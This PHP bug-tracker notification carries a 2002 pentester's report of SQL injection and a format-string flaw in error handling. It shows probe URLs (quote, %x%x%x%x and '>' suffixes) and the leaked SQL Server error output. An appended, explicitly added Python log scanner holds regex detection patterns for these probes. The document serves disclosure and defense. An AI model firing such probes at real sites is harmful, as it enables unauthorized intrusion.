ID:               20124
 Updated by:       [EMAIL PROTECTED]
 Reported By:      [EMAIL PROTECTED]
-Status:           Open
+Status:           Feedback
 Bug Type:         IIS related
 Operating System: Win2k
 PHP Version:      4.2.3
 New Comment:

What exactly do you think the bug is here?
And have you ever read this:

http://www.php.net/manual/en/security.cgi-bin.php



Previous Comments:
------------------------------------------------------------------------

[2002-10-27 13:04:42] [EMAIL PROTECTED]

During a Pentest, I was searching for sql injection, and noticed that
PHP returned the following error

http://www.victim.com/cgi-bin/ecust.cfg/php.exe/enduser/std_adp.php?p_admin=1&p_faqid=510'


Internal Error

--------------------------------------------------------------------------------
File: odbc2.c 
Line: 211 
In Fcn.: sql_prepare 
Called Fcn.: SQLPrepare() returned -1 
Description: 42000: [Microsoft][ODBC SQL Server Driver][SQL
Server]Unclosed quotation mark before the character string ')'.
42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Line 7: Incorrect
syntax near ')'.
42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Statement(s)
could not be prepared.
SQL STMT: select f.faq_id, f.faq_group_id, f.lang_id, f.title,
f.description, f.solution, f.created, f.updated, l1.label, l2.label
from faqs f left outer join labels l1 on (f.access_id = l1.label_id)
and (11 = l1.tbl) and (f.lang_id = l1.lang_id) left outer join labels
l2 on (f.status = l2.label_id) and (19 = l2.tbl) and (f.lang_id =
l2.lang_id) ,statuses s where (f.status = s.code) and (s.type_id = 4)
and (f.access_id in (1, 2)) and (f.faq_id = 510')
 
Indicating SQL injection.  By entering 

http://www.victim.com/cgi-bin/ecust.cfg/php.exe/enduser/std_adp.php?p_admin=1&p_faqid=510'A


You will notice that the returned error message shows the 'A

Internal Error

--------------------------------------------------------------------------------
File: odbc2.c 
Line: 211 
In Fcn.: sql_prepare 
Called Fcn.: SQLPrepare() returned -1 
Description: 42000: [Microsoft][ODBC SQL Server Driver][SQL
Server]Unclosed quotation mark before the character string 'A)'.
42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Line 7: Incorrect
syntax near 'A)'.
42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Statement(s)
could not be prepared.
SQL STMT: select f.faq_id, f.faq_group_id, f.lang_id, f.title,
f.description, f.solution, f.created, f.updated, l1.label, l2.label
from faqs f left outer join labels l1 on (f.access_id = l1.label_id)
and (11 = l1.tbl) and (f.lang_id = l1.lang_id) left outer join labels
l2 on (f.status = l2.label_id) and (19 = l2.tbl) and (f.lang_id =
l2.lang_id) ,statuses s where (f.status = s.code) and (s.type_id = 4)
and (f.access_id in (1, 2)) and (f.faq_id = 510'A)
 
To test for the possibility of a Format String I entered the following

http://victim.com/cgi-bin/ecust.cfg/php.exe/enduser/std_adp.php?p_admin=1&p_faqid=510'%x%x%x%x


You will note from the error logs that a format string bug is present
in four different fields

Internal Error

--------------------------------------------------------------------------------
File: odbc2.c 
Line: 211 
In Fcn.: sql_prepare 
Called Fcn.: SQLPrepare() returned -1 
Description: 42000: [Microsoft][ODBC SQL Server Driver][SQL
Server]Unclosed quotation mark before the character string
'51275075127680)'.
42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Line 7: Incorrect
syntax near '10081b6e0ffffffffdf1eb0)'.
42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Statement(s)
could not be prepared.
SQL STMT: select f.faq_id, f.faq_group_id, f.lang_id, f.title,
f.description, f.solution, f.created, f.updated, l1.label, l2.label
from faqs f left outer join labels l1 on (f.access_id = l1.label_id)
and (11 = l1.tbl) and (f.lang_id = l1.lang_id) left outer join labels
l2 on (f.status = l2.label_id) and (19 = l2.tbl) and (f.lang_id =
l2.lang_id) ,statuses s where (f.status = s.code) and (s.type_id = 4)
and (f.access_id in (1, 2)) and (f.faq_id =
510'12fbe8cf7124b4a018b46030)
 
This format string bug is NOT dependent on there being SQL injection
present.  To get the format string you just have to cause an error, for
example:

http://www.victim.com/cgi-bin/ecust.cfg/php.exe/enduser/std_adp.php?p_admin=1&p_faqid=510>


This obviously indicates that the Format String is in the Error
Handling process.

Regards

Mark Litchfield
www.ngssoftware.com
Tel +44 1241 431367
email: [EMAIL PROTECTED]
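
As an added example, not part of the bug report or of the application it describes, the following detector applies the probe patterns described above (a quote or other junk appended to a numeric id, runs of %x directives) to constructed IIS W3C-style access-log lines so the defending side can spot such requests even when the error page is never seen. All log lines, hosts and paths are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C-style log, not a real capture.
# Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-10-27 13:01:02 10.0.0.5 GET /enduser/std_adp.php p_admin=1&p_faqid=510 200
2002-10-27 13:02:10 10.0.0.5 GET /enduser/std_adp.php p_admin=1&p_faqid=510%27 500
2002-10-27 13:03:15 10.0.0.5 GET /enduser/std_adp.php p_admin=1&p_faqid=510%27A 500
2002-10-27 13:04:20 10.0.0.5 GET /enduser/std_adp.php p_admin=1&p_faqid=510'%x%x%x%x 500
2002-10-27 13:05:30 10.0.0.5 GET /enduser/std_adp.php p_admin=1&p_faqid=510%3E 500
2002-10-27 13:06:00 10.0.0.9 GET /enduser/search.php q=50%25%20off 200
"""

# Two or more consecutive printf-style directives, e.g. %x%x%x%x or %08x%08x.
FORMAT_RUN = re.compile(r"(?:%\d*[xXdiusnpc]){2,}")
# A numeric id followed by a quote, bracket or comparison character (510', 510>, 510)).
NUMERIC_TAIL = re.compile(r"^\d+\s*['\";()<>]")

def classify_value(raw):
    """Return the probe tags found in one raw query value. The value is
    percent-decoded first so %27 and a literal quote look alike; unquote()
    leaves invalid escapes such as %x untouched, which is what we want."""
    value = unquote(raw)
    tags = set()
    if value.count("'") % 2 == 1:  # unbalanced quote: the classic SQL quote probe
        tags.add("sql-quote")
    if NUMERIC_TAIL.match(value):  # an id that should be purely numeric but is not
        tags.add("numeric-id-tamper")
    if FORMAT_RUN.search(value):
        tags.add("format-string")
    return tags

def scan_log(log_text):
    """Return one finding per flagged parameter, in log order."""
    findings = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):  # skip blanks and W3C directives
            continue
        _date, time, client, _method, stem, query, status = line.split(" ", 6)
        for pair in query.split("&"):
            name, _, raw = pair.partition("=")
            tags = classify_value(raw)
            if tags:
                findings.append({"time": time, "client": client, "path": stem,
                                 "param": name, "value": unquote(raw),
                                 "status": int(status), "tags": sorted(tags)})
    return findings
```

A 5xx status on the same line is corroborating evidence that the probe reached the back end; a request that is flagged but answered with 200 is still worth a look, since the report notes that the format path is taken on any error.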


------------------------------------------------------------------------


-- 
Edit this bug report at http://bugs.php.net/?id=20124&edit=1